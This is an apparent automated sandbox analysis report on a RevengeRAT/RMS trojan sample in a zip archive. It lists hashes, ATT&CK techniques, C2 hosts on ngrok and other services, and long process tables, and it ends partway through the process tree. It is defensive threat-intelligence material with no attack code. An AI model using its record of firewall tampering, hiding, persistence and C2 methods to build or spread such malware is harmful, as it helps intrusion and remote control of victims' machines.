revengerat | 8f8f3834abab12ebd792487a89e45bdb8c8f41b51f232dfb3edb8e8140c9ff8f

Resubmissions

31-10-2024 02:19

241031-crvzeswkft 10

30-10-2024 03:56

241030-ehgrjsvldt 10

Analysis

max time kernel
1400s
max time network
2432s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
30-10-2024 03:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Win32.KeyPass.zip
Size

1.3MB
MD5

f831ffa7faa4da66482aa252536e1b0f
SHA1

aa305bd6962ebf06e26462d25140691585f85341
SHA256

8f8f3834abab12ebd792487a89e45bdb8c8f41b51f232dfb3edb8e8140c9ff8f
SHA512

3bf39aeb6c52de76aa864fb7d810cb4adbd2c7e0a2b91e8b6865967843044d628ca66a4531c720e5cd75dfb82a371e467f823819c0d9d559bd371efeec1d962a
SSDEEP

24576:k5yq9y9qttzFVPyDcYwohuvh0GsGkjHkevwLfK4uiIP/nMPbcdKK:cH3FVP8hphuF2Hk1LfK4InMLK

Score

10^/10

revengerat rms defense_evasion discovery evasion execution lateral_movement rat stealer trojan upx

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat
Revengerat family
revengerat
Rms family
rms
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
3064	net.exe
2584	net1.exe

RevengeRat Executable 1 IoCs

stealer

resource	yara_rule
behavioral1/files/0x0006000000020104-3703.dat	revengerat

Modifies Windows Firewall 2 TTPs 24 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
996	netsh.exe
1944	netsh.exe
2736	netsh.exe
1952	netsh.exe
1368	netsh.exe
2744	netsh.exe
1728	netsh.exe
2016	netsh.exe
2480	netsh.exe
2820	netsh.exe
2864	netsh.exe
1300	netsh.exe
2004	netsh.exe
3012	netsh.exe
1664	netsh.exe
2648	netsh.exe
2772	netsh.exe
3256	netsh.exe
2112	netsh.exe
2488	netsh.exe
2396	netsh.exe
2876	netsh.exe
804	netsh.exe
1056	netsh.exe

Sets file to hidden 1 TTPs 64 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
1464	attrib.exe
3544	attrib.exe
664	attrib.exe
2620	attrib.exe
3504	attrib.exe
544	attrib.exe
3852	attrib.exe
3520	attrib.exe
2360	attrib.exe
2780	attrib.exe
3136	attrib.exe
3388	attrib.exe
2352	attrib.exe
2072	attrib.exe
3864	attrib.exe
2560	attrib.exe
3564	attrib.exe
3944	attrib.exe
264	attrib.exe
1920	attrib.exe
1460	attrib.exe
3944	attrib.exe
1556	attrib.exe
3200	attrib.exe
3752	attrib.exe
3408	attrib.exe
3744	attrib.exe
2352	attrib.exe
2536	attrib.exe
2456	attrib.exe
2172	attrib.exe
2596	attrib.exe
2848	attrib.exe
1660	attrib.exe
3484	attrib.exe
3984	attrib.exe
2308	attrib.exe
544	attrib.exe
2088	attrib.exe
2528	attrib.exe
4056	attrib.exe
3144	attrib.exe
920	attrib.exe
1920	attrib.exe
3596	attrib.exe
3648	attrib.exe
316	attrib.exe
3864	attrib.exe
3632	attrib.exe
3196	attrib.exe
2408	attrib.exe
4064	attrib.exe
3708	attrib.exe
3996	attrib.exe
1412	attrib.exe
2892	attrib.exe
1948	attrib.exe
4084	attrib.exe
4072	attrib.exe
2276	attrib.exe
2368	attrib.exe
3216	attrib.exe
3104	attrib.exe
2080	attrib.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1236	icacls.exe
2224	icacls.exe
2932	icacls.exe
1728	icacls.exe
2604	icacls.exe
1740	icacls.exe
2544	icacls.exe
1640	icacls.exe
2208	icacls.exe
1204	icacls.exe
1684	icacls.exe
2792	icacls.exe
2408	icacls.exe
1592	icacls.exe
2404	icacls.exe
2484	icacls.exe
2756	icacls.exe
1884	icacls.exe
2096	icacls.exe
2804	icacls.exe
2896	icacls.exe
788	icacls.exe
1536	icacls.exe
1032	icacls.exe
2784	icacls.exe
2088	icacls.exe
1656	icacls.exe
936	icacls.exe
1368	icacls.exe
2648	icacls.exe
2408	icacls.exe
2012	icacls.exe
2848	icacls.exe
2192	icacls.exe
1692	icacls.exe
2672	icacls.exe
2116	icacls.exe
1276	icacls.exe
2936	icacls.exe
2692	icacls.exe
1952	icacls.exe
1740	icacls.exe
2532	icacls.exe
2340	icacls.exe
2668	icacls.exe
1548	icacls.exe
2168	icacls.exe
1868	icacls.exe
2756	icacls.exe
2756	icacls.exe
1300	icacls.exe
1876	icacls.exe
1964	icacls.exe
2816	icacls.exe
1996	icacls.exe
108	icacls.exe
1740	icacls.exe
2108	icacls.exe
2664	icacls.exe
1944	icacls.exe
1808	icacls.exe
1876	icacls.exe

Uses the VBS compiler for execution 1 TTPs

Command and Scripting Interpreter
T1059

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2232	powershell.exe

Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

defense_evasion

Clear Persistence

T1070.009

pid	Process
2812	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 31 IoCs

Web Service

T1102

flow	ioc
195	0.tcp.ngrok.io
229	0.tcp.ngrok.io
112	iplogger.org
131	0.tcp.ngrok.io
160	0.tcp.ngrok.io
172	0.tcp.ngrok.io
174	0.tcp.ngrok.io
121	raw.githubusercontent.com
135	0.tcp.ngrok.io
146	0.tcp.ngrok.io
104	raw.githubusercontent.com
122	raw.githubusercontent.com
162	0.tcp.ngrok.io
149	0.tcp.ngrok.io
158	0.tcp.ngrok.io
164	0.tcp.ngrok.io
166	0.tcp.ngrok.io
168	0.tcp.ngrok.io
137	0.tcp.ngrok.io
243	0.tcp.ngrok.io
156	0.tcp.ngrok.io
213	0.tcp.ngrok.io
105	raw.githubusercontent.com
133	0.tcp.ngrok.io
139	0.tcp.ngrok.io
142	0.tcp.ngrok.io
148	0.tcp.ngrok.io
125	0.tcp.ngrok.io
113	iplogger.org
170	0.tcp.ngrok.io
182	0.tcp.ngrok.io

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
98	ip-api.com

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000400000001e05a-2791.dat	autoit_exe
behavioral1/files/0x000400000001e0d0-2844.dat	autoit_exe
behavioral1/memory/2400-3074-0x0000000000E80000-0x0000000000F6C000-memory.dmp	autoit_exe

UPX packed file 15 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/900-1296-0x0000000000400000-0x0000000000413000-memory.dmp	upx
behavioral1/files/0x000400000001ddd4-1317.dat	upx
behavioral1/memory/900-1998-0x0000000000400000-0x0000000000413000-memory.dmp	upx
behavioral1/memory/2736-2003-0x0000000000400000-0x0000000000413000-memory.dmp	upx
behavioral1/memory/2736-2683-0x0000000000400000-0x0000000000413000-memory.dmp	upx
behavioral1/files/0x000500000001e7f9-2945.dat	upx
behavioral1/memory/2884-2952-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/340-2951-0x0000000003070000-0x0000000003089000-memory.dmp	upx
behavioral1/memory/2884-2980-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/files/0x000700000001e7c4-3039.dat	upx
behavioral1/memory/2400-3061-0x0000000000E80000-0x0000000000F6C000-memory.dmp	upx
behavioral1/memory/2400-3074-0x0000000000E80000-0x0000000000F6C000-memory.dmp	upx
behavioral1/memory/2660-4327-0x0000000004980000-0x0000000004993000-memory.dmp	upx
behavioral1/memory/2660-4544-0x0000000004980000-0x0000000004993000-memory.dmp	upx
behavioral1/memory/2660-4667-0x0000000004980000-0x0000000004993000-memory.dmp	upx

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2716	sc.exe
2416	sc.exe
2376	sc.exe
1756	sc.exe
2536	sc.exe
828	sc.exe
1748	sc.exe
2616	sc.exe
2556	sc.exe
3068	sc.exe
2924	sc.exe
2240	sc.exe
1504	sc.exe
2080	sc.exe
2040	sc.exe
2736	sc.exe
2004	sc.exe
1548	sc.exe
2828	sc.exe
908	sc.exe
2404	sc.exe
2480	sc.exe
2740	sc.exe
2560	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2004	2348	WerFault.exe	958
264	1092	WerFault.exe	960

Delays execution with timeout.exe 7 IoCs

evasion

pid	Process
1504	timeout.exe
2684	timeout.exe
2428	timeout.exe
1688	timeout.exe
984	timeout.exe
2108	timeout.exe
1960	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2400	ipconfig.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
1292	taskkill.exe
544	taskkill.exe
1288	taskkill.exe
288	taskkill.exe
2352	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1552	NOTEPAD.EXE

Runs .reg file with regedit 2 IoCs

pid	Process
1420	regedit.exe
1992	regedit.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1368	schtasks.exe
1412	schtasks.exe
2208	schtasks.exe
1196	schtasks.exe
2940	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2796	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2796	7zFM.exe
Token: 35	2796	7zFM.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe
Token: SeShutdownPrivilege	1188	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2796	7zFM.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1188 wrote to memory of 2324	1188	chrome.exe	32
PID 1188 wrote to memory of 2324	1188	chrome.exe	32
PID 1188 wrote to memory of 2324	1188	chrome.exe	32
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2776	1188	chrome.exe	34
PID 1188 wrote to memory of 2936	1188	chrome.exe	35
PID 1188 wrote to memory of 2936	1188	chrome.exe	35
PID 1188 wrote to memory of 2936	1188	chrome.exe	35
PID 1188 wrote to memory of 2756	1188	chrome.exe	36
PID 1188 wrote to memory of 2756	1188	chrome.exe	36
PID 1188 wrote to memory of 2756	1188	chrome.exe	36
PID 1188 wrote to memory of 2756	1188	chrome.exe	36
PID 1188 wrote to memory of 2756	1188	chrome.exe	36
PID 1188 wrote to memory of 2756	1188	chrome.exe	36
PID 1188 wrote to memory of 2756	1188	chrome.exe	36
PID 1188 wrote to memory of 2756	1188	chrome.exe	36
PID 1188 wrote to memory of 2756	1188	chrome.exe	36
PID 1188 wrote to memory of 2756	1188	chrome.exe	36
PID 1188 wrote to memory of 2756	1188	chrome.exe	36
PID 1188 wrote to memory of 2756	1188	chrome.exe	36
PID 1188 wrote to memory of 2756	1188	chrome.exe	36
PID 1188 wrote to memory of 2756	1188	chrome.exe	36
PID 1188 wrote to memory of 2756	1188	chrome.exe	36
PID 1188 wrote to memory of 2756	1188	chrome.exe	36
PID 1188 wrote to memory of 2756	1188	chrome.exe	36
PID 1188 wrote to memory of 2756	1188	chrome.exe	36
PID 1188 wrote to memory of 2756	1188	chrome.exe	36

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3200	attrib.exe
3988	attrib.exe
2088	attrib.exe
2080	attrib.exe
3564	attrib.exe
3504	attrib.exe
2408	attrib.exe
3196	attrib.exe
4056	attrib.exe
3204	attrib.exe
3708	attrib.exe
2780	attrib.exe
324	attrib.exe
2308	attrib.exe
2560	attrib.exe
1920	attrib.exe
3388	attrib.exe
2620	attrib.exe
4060	attrib.exe
3632	attrib.exe
2968	attrib.exe
3544	attrib.exe
3864	attrib.exe
2072	attrib.exe
896	attrib.exe
1660	attrib.exe
3596	attrib.exe
2004	attrib.exe
2672	attrib.exe
2772	attrib.exe
3216	attrib.exe
1556	attrib.exe
3984	attrib.exe
1612	attrib.exe
1880	attrib.exe
3944	attrib.exe
2476	attrib.exe
3136	attrib.exe
2368	attrib.exe
1812	attrib.exe
3944	attrib.exe
1784	attrib.exe
1532	attrib.exe
2528	attrib.exe
1464	attrib.exe
3484	attrib.exe
1804	attrib.exe
3136	attrib.exe
676	attrib.exe
3264	attrib.exe
4064	attrib.exe
3852	attrib.exe
3460	attrib.exe
2352	attrib.exe
1712	attrib.exe
1412	attrib.exe
2172	attrib.exe
1460	attrib.exe
932	attrib.exe
3988	attrib.exe
1172	attrib.exe
3500	attrib.exe
3500	attrib.exe
1684	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Win32.KeyPass.zip"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2796

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef8089758,0x7fef8089768,0x7fef8089778
  2⤵
  PID:2324
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1116 --field-trial-handle=1192,i,9829298387769689448,11388286537158055374,131072 /prefetch:2
  2⤵
  PID:2776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1192,i,9829298387769689448,11388286537158055374,131072 /prefetch:8
  2⤵
  PID:2936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1608 --field-trial-handle=1192,i,9829298387769689448,11388286537158055374,131072 /prefetch:8
  2⤵
  PID:2756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2172 --field-trial-handle=1192,i,9829298387769689448,11388286537158055374,131072 /prefetch:1
  2⤵
  PID:2732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2184 --field-trial-handle=1192,i,9829298387769689448,11388286537158055374,131072 /prefetch:1
  2⤵
  PID:2076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1308 --field-trial-handle=1192,i,9829298387769689448,11388286537158055374,131072 /prefetch:2
  2⤵
  PID:1156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1372 --field-trial-handle=1192,i,9829298387769689448,11388286537158055374,131072 /prefetch:1
  2⤵
  PID:3000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3460 --field-trial-handle=1192,i,9829298387769689448,11388286537158055374,131072 /prefetch:8
  2⤵
  PID:2484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3576 --field-trial-handle=1192,i,9829298387769689448,11388286537158055374,131072 /prefetch:8
  2⤵
  PID:2788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3600 --field-trial-handle=1192,i,9829298387769689448,11388286537158055374,131072 /prefetch:8
  2⤵
  PID:1460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3808 --field-trial-handle=1192,i,9829298387769689448,11388286537158055374,131072 /prefetch:8
  2⤵
  PID:316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3648 --field-trial-handle=1192,i,9829298387769689448,11388286537158055374,131072 /prefetch:8
  2⤵
  PID:1576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3628 --field-trial-handle=1192,i,9829298387769689448,11388286537158055374,131072 /prefetch:1
  2⤵
  PID:1592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3620 --field-trial-handle=1192,i,9829298387769689448,11388286537158055374,131072 /prefetch:1
  2⤵
  PID:1804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2584 --field-trial-handle=1192,i,9829298387769689448,11388286537158055374,131072 /prefetch:8
  2⤵
  PID:3068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3996 --field-trial-handle=1192,i,9829298387769689448,11388286537158055374,131072 /prefetch:8
  2⤵
  PID:2076
- C:\Program Files\Google\Chrome\Application\chrome.exe
